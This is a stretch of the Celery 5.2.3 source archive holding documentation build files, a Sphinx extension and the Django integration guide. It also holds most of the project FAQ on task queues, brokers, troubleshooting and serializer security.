$(BUILDDIR)/latex @echo "Running LaTeX files through platex and dvipdfmx..." $(MAKE) -C $(BUILDDIR)/latex all-pdf-ja @echo "pdflatex finished; the PDF files are in $(BUILDDIR)/latex." .PHONY: text text: $(SPHINXBUILD) -b text $(ALLSPHINXOPTS) $(BUILDDIR)/text @echo @echo "Build finished. The text files are in $(BUILDDIR)/text." .PHONY: man man: $(SPHINXBUILD) -b man $(ALLSPHINXOPTS) $(BUILDDIR)/man @echo @echo "Build finished. The manual pages are in $(BUILDDIR)/man." .PHONY: texinfo texinfo: $(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo @echo @echo "Build finished. The Texinfo files are in $(BUILDDIR)/texinfo." @echo "Run \`make' in that directory to run these through makeinfo" \ "(use \`make info' here to do that automatically)." .PHONY: info info: $(SPHINXBUILD) -b texinfo $(ALLSPHINXOPTS) $(BUILDDIR)/texinfo @echo "Running Texinfo files through makeinfo..." make -C $(BUILDDIR)/texinfo info @echo "makeinfo finished; the Info files are in $(BUILDDIR)/texinfo." .PHONY: gettext gettext: $(SPHINXBUILD) -b gettext $(I18NSPHINXOPTS) $(BUILDDIR)/locale @echo @echo "Build finished. The message catalogs are in $(BUILDDIR)/locale." .PHONY: changes changes: $(SPHINXBUILD) -b changes $(ALLSPHINXOPTS) $(BUILDDIR)/changes @echo @echo "The overview file is in $(BUILDDIR)/changes." .PHONY: linkcheck linkcheck: $(SPHINXBUILD) -b linkcheck $(ALLSPHINXOPTS) $(BUILDDIR)/linkcheck @echo @echo "Link check complete; look for any errors in the above output " \ "or in $(BUILDDIR)/linkcheck/output.txt." .PHONY: doctest doctest: $(SPHINXBUILD) -b doctest $(ALLSPHINXOPTS) $(BUILDDIR)/doctest @echo "Testing of doctests in the sources finished, look at the " \ "results in $(BUILDDIR)/doctest/output.txt." .PHONY: coverage coverage: $(SPHINXBUILD) -b coverage $(ALLSPHINXOPTS) $(BUILDDIR)/coverage @echo "Testing of coverage in the sources finished, look at the " \ "results in $(BUILDDIR)/coverage/python.txt." .PHONY: apicheck apicheck: $(SPHINXBUILD) -b apicheck $(ALLSPHINXOPTS) $(BUILDDIR)/apicheck .PHONY: configcheck configcheck: $(SPHINXBUILD) -b configcheck $(ALLSPHINXOPTS) $(BUILDDIR)/configcheck .PHONY: spelling spelling: SPELLCHECK=1 $(SPHINXBUILD) -b spelling $(ALLSPHINXOPTS) $(BUILDDIR)/spelling .PHONY: xml xml: $(SPHINXBUILD) -b xml $(ALLSPHINXOPTS) $(BUILDDIR)/xml @echo @echo "Build finished. The XML files are in $(BUILDDIR)/xml." .PHONY: pseudoxml pseudoxml: $(SPHINXBUILD) -b pseudoxml $(ALLSPHINXOPTS) $(BUILDDIR)/pseudoxml @echo @echo "Build finished. 
The pseudo-XML files are in $(BUILDDIR)/pseudoxml." .PHONY: livehtml livehtml: sphinx-autobuild -b html --host 0.0.0.0 --port 7000 --watch $(APP) -c . $(SOURCEDIR) $(BUILDDIR)/html././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/THANKS0000664000175000017500000000075600000000000014550 0ustar00asifasif00000000000000Thanks to Rune Halvorsen for the name. Thanks to Anton Tsigularov for the previous name (crunchy) that we had to abandon because of an existing project with that name. Thanks to Armin Ronacher for the Sphinx theme. Thanks to Brian K. Jones for bunny.py (https://github.com/bkjones/bunny), the tool that inspired 'celery amqp'. Thanks to Barry Pederson for amqplib (the project py-amqp forked). Thanks to Ty Wilkins for the Celery stalk logo (2016). ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5437522 celery-5.2.3/docs/_ext/0000775000175000017500000000000000000000000014564 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/_ext/celerydocs.py0000664000175000017500000001205400000000000017274 0ustar00asifasif00000000000000import typing from docutils import nodes from sphinx.errors import NoUri APPATTRS = { 'amqp': 'celery.app.amqp.AMQP', 'backend': 'celery.backends.base.BaseBackend', 'conf': 'celery.app.utils.Settings', 'control': 'celery.app.control.Control', 'events': 'celery.events.Events', 'loader': 'celery.app.loaders.base.BaseLoader', 'log': 'celery.app.log.Logging', 'pool': 'kombu.connection.ConnectionPool', 'tasks': 'celery.app.registry.Registry', 'AsyncResult': 'celery.result.AsyncResult', 'ResultSet': 'celery.result.ResultSet', 'GroupResult': 'celery.result.GroupResult', 'Worker': 'celery.apps.worker.Worker', 'WorkController': 'celery.worker.WorkController', 'Beat': 'celery.apps.beat.Beat', 'Task': 'celery.app.task.Task', 'signature': 'celery.canvas.Signature', } APPDIRECT = { 'on_configure', 'on_after_configure', 'on_after_finalize', 'set_current', 'set_default', 'close', 'on_init', 'start', 'worker_main', 'task', 'gen_task_name', 'finalize', 'add_defaults', 'config_from_object', 'config_from_envvar', 'config_from_cmdline', 'setup_security', 'autodiscover_tasks', 'send_task', 'connection', 'connection_or_acquire', 'producer_or_acquire', 'prepare_config', 'now', 'select_queues', 'either', 'bugreport', 'create_task_cls', 'subclass_with_self', 'annotations', 'current_task', 'oid', 'timezone', '__reduce_keys__', 'fixups', 'finalized', 'configured', 'add_periodic_task', 'autofinalize', 'steps', 'user_options', 'main', 'clock', } APPATTRS.update({x: f'celery.Celery.{x}' for x in APPDIRECT}) ABBRS = { 'Celery': 'celery.Celery', } ABBR_EMPTY = { 'exc': 'celery.exceptions', } DEFAULT_EMPTY = 'celery.Celery' def typeify(S, type): if type in ('meth', 'func'): return S + '()' return S def shorten(S, newtarget, src_dict): if S.startswith('@-'): return S[2:] elif S.startswith('@'): if src_dict is APPATTRS: return '.'.join(['app', S[1:]]) return S[1:] return S def get_abbr(pre, rest, type, orig=None): if pre: for d in APPATTRS, ABBRS: try: return d[pre], rest, d except KeyError: pass raise KeyError('Unknown abbreviation: {} ({})'.format( '.'.join([pre, rest]) if orig is None else orig, type, )) else: for d in APPATTRS, ABBRS: try: return d[rest], '', d except KeyError: pass return ABBR_EMPTY.get(type, DEFAULT_EMPTY), rest, ABBR_EMPTY def resolve(S, 
type): if '.' not in S: try: getattr(typing, S) except AttributeError: pass else: return f'typing.{S}', None orig = S if S.startswith('@'): S = S.lstrip('@-') try: pre, rest = S.split('.', 1) except ValueError: pre, rest = '', S target, rest, src = get_abbr(pre, rest, type, orig) return '.'.join([target, rest]) if rest else target, src return S, None def pkg_of(module_fqdn): return module_fqdn.split('.', 1)[0] def basename(module_fqdn): return module_fqdn.lstrip('@').rsplit('.', -1)[-1] def modify_textnode(T, newtarget, node, src_dict, type): src = node.children[0].rawsource return nodes.Text( (typeify(basename(T), type) if '~' in src else typeify(shorten(T, newtarget, src_dict), type)), src, ) def maybe_resolve_abbreviations(app, env, node, contnode): domainname = node.get('refdomain') target = node['reftarget'] type = node['reftype'] if target.startswith('@'): newtarget, src_dict = resolve(target, type) node['reftarget'] = newtarget # shorten text if '~' is not enabled. if len(contnode) and isinstance(contnode[0], nodes.Text): contnode[0] = modify_textnode(target, newtarget, node, src_dict, type) if domainname: try: domain = env.domains[node.get('refdomain')] except KeyError: raise NoUri try: return domain.resolve_xref(env, node['refdoc'], app.builder, type, newtarget, node, contnode) except KeyError: raise NoUri def setup(app): app.connect( 'missing-reference', maybe_resolve_abbreviations, ) app.add_crossref_type( directivename='sig', rolename='sig', indextemplate='pair: %s; sig', ) app.add_crossref_type( directivename='state', rolename='state', indextemplate='pair: %s; state', ) app.add_crossref_type( directivename='control', rolename='control', indextemplate='pair: %s; control', ) app.add_crossref_type( directivename='event', rolename='event', indextemplate='pair: %s; event', ) return { 'parallel_read_safe': True } ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5437522 celery-5.2.3/docs/_static/0000775000175000017500000000000000000000000015253 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/_static/.keep0000664000175000017500000000000000000000000016166 0ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5477524 celery-5.2.3/docs/_templates/0000775000175000017500000000000000000000000015762 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/_templates/sidebardonations.html0000664000175000017500000000074600000000000022207 0ustar00asifasif00000000000000 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/changelog.rst0000664000175000017500000000003600000000000016305 0ustar00asifasif00000000000000.. include:: ../Changelog.rst ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/community.rst0000664000175000017500000000172500000000000016410 0ustar00asifasif00000000000000.. _community: ======================= Community Resources ======================= This is a list of external blog posts, tutorials, and slides related to Celery. If you have a link that's missing from this list, please contact the mailing-list or submit a patch. .. contents:: :local: .. _community-resources: Resources ========= .. 
_res-using-celery: Who's using Celery ------------------ https://github.com/celery/celery/wiki#companieswebsites-using-celery .. _res-wiki: Wiki ---- https://github.com/celery/celery/wiki .. _res-stackoverflow: Celery questions on Stack Overflow ---------------------------------- https://stackoverflow.com/search?q=celery&tab=newest .. _res-mailing-list-archive: Mailing-list Archive: celery-users ---------------------------------- http://blog.gmane.org/gmane.comp.python.amqp.celery.user .. _res-irc-logs: .. _community-news: News ==== This section has moved to the Celery homepage: http://celeryproject.org/community/ ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/conf.py0000664000175000017500000000505200000000000015126 0ustar00asifasif00000000000000from sphinx_celery import conf globals().update(conf.build_config( 'celery', __file__, project='Celery', version_dev='6.0', version_stable='5.0', canonical_url='http://docs.celeryproject.org', webdomain='celeryproject.org', github_project='celery/celery', author='Ask Solem & contributors', author_name='Ask Solem', copyright='2009-2021', publisher='Celery Project', html_logo='images/celery_512.png', html_favicon='images/favicon.ico', html_prepend_sidebars=['sidebardonations.html'], extra_extensions=[ 'sphinx_click', 'sphinx.ext.napoleon', 'celery.contrib.sphinx', 'celerydocs', ], extra_intersphinx_mapping={ 'cyanide': ('https://cyanide.readthedocs.io/en/latest', None), 'click': ('https://click.palletsprojects.com/en/7.x/', None), }, apicheck_ignore_modules=[ 'celery.__main__', 'celery.contrib.testing', 'celery.contrib.testing.tasks', 'celery.bin', 'celery.bin.celeryd_detach', 'celery.contrib', r'celery.fixups.*', 'celery.local', 'celery.app.base', 'celery.apps', 'celery.canvas', 'celery.concurrency.asynpool', 'celery.utils.encoding', r'celery.utils.static.*', ], linkcheck_ignore=[ r'^http://localhost' ], autodoc_mock_imports=[ 'riak' ] )) settings = {} ignored_settings = { # Deprecated broker settings (replaced by broker_url) 'broker_host', 'broker_user', 'broker_password', 'broker_vhost', 'broker_port', 'broker_transport', # deprecated task settings. 'chord_propagates', # MongoDB settings replaced by URL config., 'mongodb_backend_settings', # Database URL replaced by URL config (result_backend = db+...). 'database_url', # Redis settings replaced by URL config. 'redis_host', 'redis_port', 'redis_db', 'redis_password', # Old deprecated AMQP result backend. 'result_exchange', 'result_exchange_type', # Experimental 'worker_agent', # Deprecated worker settings. 'worker_pool_putlocks', } def configcheck_project_settings(): from celery.app.defaults import NAMESPACES, flatten settings.update(dict(flatten(NAMESPACES))) return set(settings) def is_deprecated_setting(setting): try: return settings[setting].deprecate_by except KeyError: pass def configcheck_should_ignore(setting): return setting in ignored_settings or is_deprecated_setting(setting) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/configuration.html0000664000175000017500000000012300000000000017356 0ustar00asifasif00000000000000Moved ===== This document has now moved into the userguide: :ref:`configuration` ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/contributing.rst0000664000175000017500000000004100000000000017061 0ustar00asifasif00000000000000.. 
include:: ../CONTRIBUTING.rst ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/copyright.rst0000664000175000017500000000164300000000000016373 0ustar00asifasif00000000000000Copyright ========= *Celery User Manual* by Ask Solem .. |copy| unicode:: U+000A9 .. COPYRIGHT SIGN Copyright |copy| 2009-2016, Ask Solem. All rights reserved. This material may be copied or distributed only subject to the terms and conditions set forth in the `Creative Commons Attribution-ShareAlike 4.0 International` `_ license. You may share and adapt the material, even for commercial purposes, but you must give the original author credit. If you alter, transform, or build upon this work, you may distribute the resulting work only under the same license or a license compatible to this one. .. note:: While the *Celery* documentation is offered under the Creative Commons *Attribution-ShareAlike 4.0 International* license the Celery *software* is offered under the `BSD License (3 Clause) `_ ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.5477524 celery-5.2.3/docs/django/0000775000175000017500000000000000000000000015067 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/docs/django/first-steps-with-django.rst0000664000175000017500000001732000000000000022320 0ustar00asifasif00000000000000.. _django-first-steps: ========================= First steps with Django ========================= Using Celery with Django ======================== .. note:: Previous versions of Celery required a separate library to work with Django, but since 3.1 this is no longer the case. Django is supported out of the box now so this document only contains a basic way to integrate Celery and Django. You'll use the same API as non-Django users so you're recommended to read the :ref:`first-steps` tutorial first and come back to this tutorial. When you have a working example you can continue to the :ref:`next-steps` guide. .. note:: Celery 5.0.x supports Django 1.11 LTS or newer versions. Please use Celery 4.4.x for versions older than Django 1.11. To use Celery with your Django project you must first define an instance of the Celery library (called an "app") If you have a modern Django project layout like:: - proj/ - manage.py - proj/ - __init__.py - settings.py - urls.py then the recommended way is to create a new `proj/proj/celery.py` module that defines the Celery instance: :file: `proj/proj/celery.py` .. literalinclude:: ../../examples/django/proj/celery.py Then you need to import this app in your :file:`proj/proj/__init__.py` module. This ensures that the app is loaded when Django starts so that the ``@shared_task`` decorator (mentioned later) will use it: :file:`proj/proj/__init__.py`: .. literalinclude:: ../../examples/django/proj/__init__.py Note that this example project layout is suitable for larger projects, for simple projects you may use a single contained module that defines both the app and tasks, like in the :ref:`tut-celery` tutorial. Let's break down what happens in the first module, first, we set the default :envvar:`DJANGO_SETTINGS_MODULE` environment variable for the :program:`celery` command-line program: .. 
code-block:: python os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings') You don't need this line, but it saves you from always passing in the settings module to the ``celery`` program. It must always come before creating the app instances, as is what we do next: .. code-block:: python app = Celery('proj') This is our instance of the library, you can have many instances but there's probably no reason for that when using Django. We also add the Django settings module as a configuration source for Celery. This means that you don't have to use multiple configuration files, and instead configure Celery directly from the Django settings; but you can also separate them if wanted. .. code-block:: python app.config_from_object('django.conf:settings', namespace='CELERY') The uppercase name-space means that all :ref:`Celery configuration options ` must be specified in uppercase instead of lowercase, and start with ``CELERY_``, so for example the :setting:`task_always_eager` setting becomes ``CELERY_TASK_ALWAYS_EAGER``, and the :setting:`broker_url` setting becomes ``CELERY_BROKER_URL``. This also applies to the workers settings, for instance, the :setting:`worker_concurrency` setting becomes ``CELERY_WORKER_CONCURRENCY``. For example, a Django project's configuration file might include: .. code-block:: python :caption: settings.py ... # Celery Configuration Options CELERY_TIMEZONE = "Australia/Tasmania" CELERY_TASK_TRACK_STARTED = True CELERY_TASK_TIME_LIMIT = 30 * 60 You can pass the settings object directly instead, but using a string is better since then the worker doesn't have to serialize the object. The ``CELERY_`` namespace is also optional, but recommended (to prevent overlap with other Django settings). Next, a common practice for reusable apps is to define all tasks in a separate ``tasks.py`` module, and Celery does have a way to auto-discover these modules: .. code-block:: python app.autodiscover_tasks() With the line above Celery will automatically discover tasks from all of your installed apps, following the ``tasks.py`` convention:: - app1/ - tasks.py - models.py - app2/ - tasks.py - models.py This way you don't have to manually add the individual modules to the :setting:`CELERY_IMPORTS ` setting. Finally, the ``debug_task`` example is a task that dumps its own request information. This is using the new ``bind=True`` task option introduced in Celery 3.1 to easily refer to the current task instance. Using the ``@shared_task`` decorator ------------------------------------ The tasks you write will probably live in reusable apps, and reusable apps cannot depend on the project itself, so you also cannot import your app instance directly. The ``@shared_task`` decorator lets you create tasks without having any concrete app instance: :file:`demoapp/tasks.py`: .. literalinclude:: ../../examples/django/demoapp/tasks.py .. seealso:: You can find the full source code for the Django example project at: https://github.com/celery/celery/tree/master/examples/django/ Extensions ========== .. _django-celery-results: ``django-celery-results`` - Using the Django ORM/Cache as a result backend -------------------------------------------------------------------------- The :pypi:`django-celery-results` extension provides result backends using either the Django ORM, or the Django Cache framework. To use this with your project you need to follow these steps: #. Install the :pypi:`django-celery-results` library: .. code-block:: console $ pip install django-celery-results #. 
Add ``django_celery_results`` to ``INSTALLED_APPS`` in your Django project's :file:`settings.py`:: INSTALLED_APPS = ( ..., 'django_celery_results', ) Note that there is no dash in the module name, only underscores. #. Create the Celery database tables by performing a database migrations: .. code-block:: console $ python manage.py migrate django_celery_results #. Configure Celery to use the :pypi:`django-celery-results` backend. Assuming you are using Django's :file:`settings.py` to also configure Celery, add the following settings: .. code-block:: python CELERY_RESULT_BACKEND = 'django-db' For the cache backend you can use: .. code-block:: python CELERY_CACHE_BACKEND = 'django-cache' We can also use the cache defined in the CACHES setting in django. .. code-block:: python # celery setting. CELERY_CACHE_BACKEND = 'default' # django setting. CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.db.DatabaseCache', 'LOCATION': 'my_cache_table', } } For additional configuration options, view the :ref:`conf-result-backend` reference. ``django-celery-beat`` - Database-backed Periodic Tasks with Admin interface. ----------------------------------------------------------------------------- See :ref:`beat-custom-schedulers` for more information. Starting the worker process =========================== In a production environment you'll want to run the worker in the background as a daemon - see :ref:`daemonizing` - but for testing and development it is useful to be able to start a worker instance by using the :program:`celery worker` manage command, much as you'd use Django's :command:`manage.py runserver`: .. code-block:: console $ celery -A proj worker -l INFO For a complete listing of the command-line options available, use the help command: .. code-block:: console $ celery help Where to go from here ===================== If you want to learn more you should continue to the :ref:`Next Steps ` tutorial, and after that you can study the :ref:`User Guide `. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/django/index.rst0000664000175000017500000000021100000000000016722 0ustar00asifasif00000000000000.. _django: ========= Django ========= :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 first-steps-with-django ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/faq.rst0000664000175000017500000007214000000000000015132 0ustar00asifasif00000000000000.. _faq: ============================ Frequently Asked Questions ============================ .. contents:: :local: .. _faq-general: General ======= .. _faq-when-to-use: What kinds of things should I use Celery for? --------------------------------------------- **Answer:** `Queue everything and delight everyone`_ is a good article describing why you'd use a queue in a web context. .. _`Queue everything and delight everyone`: https://decafbad.com/blog/2008/07/04/queue-everything-and-delight-everyone These are some common use cases: * Running something in the background. For example, to finish the web request as soon as possible, then update the users page incrementally. This gives the user the impression of good performance and "snappiness", even though the real work might actually take some time. * Running something after the web request has finished. * Making sure something is done, by executing it asynchronously and using retries. * Scheduling periodic work. 
And to some degree: * Distributed computing. * Parallel execution. .. _faq-misconceptions: Misconceptions ============== .. _faq-loc: Does Celery really consist of 50.000 lines of code? --------------------------------------------------- **Answer:** No, this and similarly large numbers have been reported at various locations. The numbers as of this writing are: - core: 7,141 lines of code. - tests: 14,209 lines. - backends, contrib, compat utilities: 9,032 lines. Lines of code isn't a useful metric, so even if Celery did consist of 50k lines of code you wouldn't be able to draw any conclusions from such a number. Does Celery have many dependencies? ----------------------------------- A common criticism is that Celery uses too many dependencies. The rationale behind such a fear is hard to imagine, especially considering code reuse as the established way to combat complexity in modern software development, and that the cost of adding dependencies is very low now that package managers like pip and PyPI makes the hassle of installing and maintaining dependencies a thing of the past. Celery has replaced several dependencies along the way, and the current list of dependencies are: celery ~~~~~~ - :pypi:`kombu` Kombu is part of the Celery ecosystem and is the library used to send and receive messages. It's also the library that enables us to support many different message brokers. It's also used by the OpenStack project, and many others, validating the choice to separate it from the Celery code-base. - :pypi:`billiard` Billiard is a fork of the Python multiprocessing module containing many performance and stability improvements. It's an eventual goal that these improvements will be merged back into Python one day. It's also used for compatibility with older Python versions that don't come with the multiprocessing module. - :pypi:`pytz` The pytz module provides timezone definitions and related tools. kombu ~~~~~ Kombu depends on the following packages: - :pypi:`amqp` The underlying pure-Python amqp client implementation. AMQP being the default broker this is a natural dependency. .. note:: To handle the dependencies for popular configuration choices Celery defines a number of "bundle" packages, see :ref:`bundles`. .. _faq-heavyweight: Is Celery heavy-weight? ----------------------- Celery poses very little overhead both in memory footprint and performance. But please note that the default configuration isn't optimized for time nor space, see the :ref:`guide-optimizing` guide for more information. .. _faq-serialization-is-a-choice: Is Celery dependent on pickle? ------------------------------ **Answer:** No, Celery can support any serialization scheme. We have built-in support for JSON, YAML, Pickle, and msgpack. Every task is associated with a content type, so you can even send one task using pickle, another using JSON. The default serialization support used to be pickle, but since 4.0 the default is now JSON. If you require sending complex Python objects as task arguments, you can use pickle as the serialization format, but see notes in :ref:`security-serializers`. If you need to communicate with other languages you should use a serialization format suited to that task, which pretty much means any serializer that's not pickle. You can set a global default serializer, the default serializer for a particular Task, or even what serializer to use when sending a single task instance. .. _faq-is-celery-for-django-only: Is Celery for Django only? 
-------------------------- **Answer:** No, you can use Celery with any framework, web or otherwise. .. _faq-is-celery-for-rabbitmq-only: Do I have to use AMQP/RabbitMQ? ------------------------------- **Answer**: No, although using RabbitMQ is recommended you can also use Redis, SQS, or Qpid. See :ref:`brokers` for more information. Redis as a broker won't perform as well as an AMQP broker, but the combination RabbitMQ as broker and Redis as a result store is commonly used. If you have strict reliability requirements you're encouraged to use RabbitMQ or another AMQP broker. Some transports also use polling, so they're likely to consume more resources. However, if you for some reason aren't able to use AMQP, feel free to use these alternatives. They will probably work fine for most use cases, and note that the above points are not specific to Celery; If using Redis/database as a queue worked fine for you before, it probably will now. You can always upgrade later if you need to. .. _faq-is-celery-multilingual: Is Celery multilingual? ------------------------ **Answer:** Yes. :mod:`~celery.bin.worker` is an implementation of Celery in Python. If the language has an AMQP client, there shouldn't be much work to create a worker in your language. A Celery worker is just a program connecting to the broker to process messages. Also, there's another way to be language-independent, and that's to use REST tasks, instead of your tasks being functions, they're URLs. With this information you can even create simple web servers that enable preloading of code. Simply expose an endpoint that performs an operation, and create a task that just performs an HTTP request to that endpoint. You can also use `Flower's `_ `REST API `_ to invoke tasks. .. _faq-troubleshooting: Troubleshooting =============== .. _faq-mysql-deadlocks: MySQL is throwing deadlock errors, what can I do? ------------------------------------------------- **Answer:** MySQL has default isolation level set to `REPEATABLE-READ`, if you don't really need that, set it to `READ-COMMITTED`. You can do that by adding the following to your :file:`my.cnf`:: [mysqld] transaction-isolation = READ-COMMITTED For more information about InnoDB`s transaction model see `MySQL - The InnoDB Transaction Model and Locking`_ in the MySQL user manual. (Thanks to Honza Kral and Anton Tsigularov for this solution) .. _`MySQL - The InnoDB Transaction Model and Locking`: https://dev.mysql.com/doc/refman/5.1/en/innodb-transaction-model.html .. _faq-worker-hanging: The worker isn't doing anything, just hanging --------------------------------------------- **Answer:** See `MySQL is throwing deadlock errors, what can I do?`_, or `Why is Task.delay/apply\*/the worker just hanging?`_. .. _faq-results-unreliable: Task results aren't reliably returning -------------------------------------- **Answer:** If you're using the database backend for results, and in particular using MySQL, see `MySQL is throwing deadlock errors, what can I do?`_. .. _faq-publish-hanging: Why is Task.delay/apply\*/the worker just hanging? -------------------------------------------------- **Answer:** There's a bug in some AMQP clients that'll make it hang if it's not able to authenticate the current user, the password doesn't match or the user doesn't have access to the virtual host specified. Be sure to check your broker logs (for RabbitMQ that's :file:`/var/log/rabbitmq/rabbit.log` on most systems), it usually contains a message describing the reason. .. 
_faq-worker-on-freebsd: Does it work on FreeBSD? ------------------------ **Answer:** Depends; When using the RabbitMQ (AMQP) and Redis transports it should work out of the box. For other transports the compatibility prefork pool is used and requires a working POSIX semaphore implementation, this is enabled in FreeBSD by default since FreeBSD 8.x. For older version of FreeBSD, you have to enable POSIX semaphores in the kernel and manually recompile billiard. Luckily, Viktor Petersson has written a tutorial to get you started with Celery on FreeBSD here: http://www.playingwithwire.com/2009/10/how-to-get-celeryd-to-work-on-freebsd/ .. _faq-duplicate-key-errors: I'm having `IntegrityError: Duplicate Key` errors. Why? --------------------------------------------------------- **Answer:** See `MySQL is throwing deadlock errors, what can I do?`_. Thanks to :github_user:`@howsthedotcom`. .. _faq-worker-stops-processing: Why aren't my tasks processed? ------------------------------ **Answer:** With RabbitMQ you can see how many consumers are currently receiving tasks by running the following command: .. code-block:: console $ rabbitmqctl list_queues -p name messages consumers Listing queues ... celery 2891 2 This shows that there's 2891 messages waiting to be processed in the task queue, and there are two consumers processing them. One reason that the queue is never emptied could be that you have a stale worker process taking the messages hostage. This could happen if the worker wasn't properly shut down. When a message is received by a worker the broker waits for it to be acknowledged before marking the message as processed. The broker won't re-send that message to another consumer until the consumer is shut down properly. If you hit this problem you have to kill all workers manually and restart them: .. code-block:: console $ pkill 'celery worker' $ # - If you don't have pkill use: $ # ps auxww | awk '/celery worker/ {print $2}' | xargs kill You may have to wait a while until all workers have finished executing tasks. If it's still hanging after a long time you can kill them by force with: .. code-block:: console $ pkill -9 'celery worker' $ # - If you don't have pkill use: $ # ps auxww | awk '/celery worker/ {print $2}' | xargs kill -9 .. _faq-task-does-not-run: Why won't my Task run? ---------------------- **Answer:** There might be syntax errors preventing the tasks module being imported. You can find out if Celery is able to run the task by executing the task manually: .. code-block:: python >>> from myapp.tasks import MyPeriodicTask >>> MyPeriodicTask.delay() Watch the workers log file to see if it's able to find the task, or if some other error is happening. .. _faq-periodic-task-does-not-run: Why won't my periodic task run? ------------------------------- **Answer:** See `Why won't my Task run?`_. .. _faq-purge-the-queue: How do I purge all waiting tasks? --------------------------------- **Answer:** You can use the ``celery purge`` command to purge all configured task queues: .. code-block:: console $ celery -A proj purge or programmatically: .. code-block:: pycon >>> from proj.celery import app >>> app.control.purge() 1753 If you only want to purge messages from a specific queue you have to use the AMQP API or the :program:`celery amqp` utility: .. code-block:: console $ celery -A proj amqp queue.purge The number 1753 is the number of messages deleted. You can also start the worker with the :option:`--purge ` option enabled to purge messages when the worker starts. .. 
_faq-messages-left-after-purge: I've purged messages, but there are still messages left in the queue? --------------------------------------------------------------------- **Answer:** Tasks are acknowledged (removed from the queue) as soon as they're actually executed. After the worker has received a task, it will take some time until it's actually executed, especially if there are a lot of tasks already waiting for execution. Messages that aren't acknowledged are held on to by the worker until it closes the connection to the broker (AMQP server). When that connection is closed (e.g., because the worker was stopped) the tasks will be re-sent by the broker to the next available worker (or the same worker when it has been restarted), so to properly purge the queue of waiting tasks you have to stop all the workers, and then purge the tasks using :func:`celery.control.purge`. .. _faq-results: Results ======= .. _faq-get-result-by-task-id: How do I get the result of a task if I have the ID that points there? ---------------------------------------------------------------------- **Answer**: Use `task.AsyncResult`: .. code-block:: pycon >>> result = my_task.AsyncResult(task_id) >>> result.get() This will give you a :class:`~celery.result.AsyncResult` instance using the tasks current result backend. If you need to specify a custom result backend, or you want to use the current application's default backend you can use :class:`@AsyncResult`: .. code-block:: pycon >>> result = app.AsyncResult(task_id) >>> result.get() .. _faq-security: Security ======== Isn't using `pickle` a security concern? ---------------------------------------- **Answer**: Indeed, since Celery 4.0 the default serializer is now JSON to make sure people are choosing serializers consciously and aware of this concern. It's essential that you protect against unauthorized access to your broker, databases and other services transmitting pickled data. Note that this isn't just something you should be aware of with Celery, for example also Django uses pickle for its cache client. For the task messages you can set the :setting:`task_serializer` setting to "json" or "yaml" instead of pickle. Similarly for task results you can set :setting:`result_serializer`. For more details of the formats used and the lookup order when checking what format to use for a task see :ref:`calling-serializers` Can messages be encrypted? -------------------------- **Answer**: Some AMQP brokers supports using SSL (including RabbitMQ). You can enable this using the :setting:`broker_use_ssl` setting. It's also possible to add additional encryption and security to messages, if you have a need for this then you should contact the :ref:`mailing-list`. Is it safe to run :program:`celery worker` as root? --------------------------------------------------- **Answer**: No! We're not currently aware of any security issues, but it would be incredibly naive to assume that they don't exist, so running the Celery services (:program:`celery worker`, :program:`celery beat`, :program:`celeryev`, etc) as an unprivileged user is recommended. .. _faq-brokers: Brokers ======= Why is RabbitMQ crashing? ------------------------- **Answer:** RabbitMQ will crash if it runs out of memory. This will be fixed in a future release of RabbitMQ. please refer to the RabbitMQ FAQ: https://www.rabbitmq.com/faq.html#node-runs-out-of-memory .. note:: This is no longer the case, RabbitMQ versions 2.0 and above includes a new persister, that's tolerant to out of memory errors. 
RabbitMQ 2.1 or higher is recommended for Celery. If you're still running an older version of RabbitMQ and experience crashes, then please upgrade! Misconfiguration of Celery can eventually lead to a crash on older version of RabbitMQ. Even if it doesn't crash, this can still consume a lot of resources, so it's important that you're aware of the common pitfalls. * Events. Running :mod:`~celery.bin.worker` with the :option:`-E ` option will send messages for events happening inside of the worker. Events should only be enabled if you have an active monitor consuming them, or if you purge the event queue periodically. * AMQP backend results. When running with the AMQP result backend, every task result will be sent as a message. If you don't collect these results, they will build up and RabbitMQ will eventually run out of memory. This result backend is now deprecated so you shouldn't be using it. Use either the RPC backend for rpc-style calls, or a persistent backend if you need multi-consumer access to results. Results expire after 1 day by default. It may be a good idea to lower this value by configuring the :setting:`result_expires` setting. If you don't use the results for a task, make sure you set the `ignore_result` option: .. code-block:: python @app.task(ignore_result=True) def mytask(): pass class MyTask(Task): ignore_result = True .. _faq-use-celery-with-stomp: Can I use 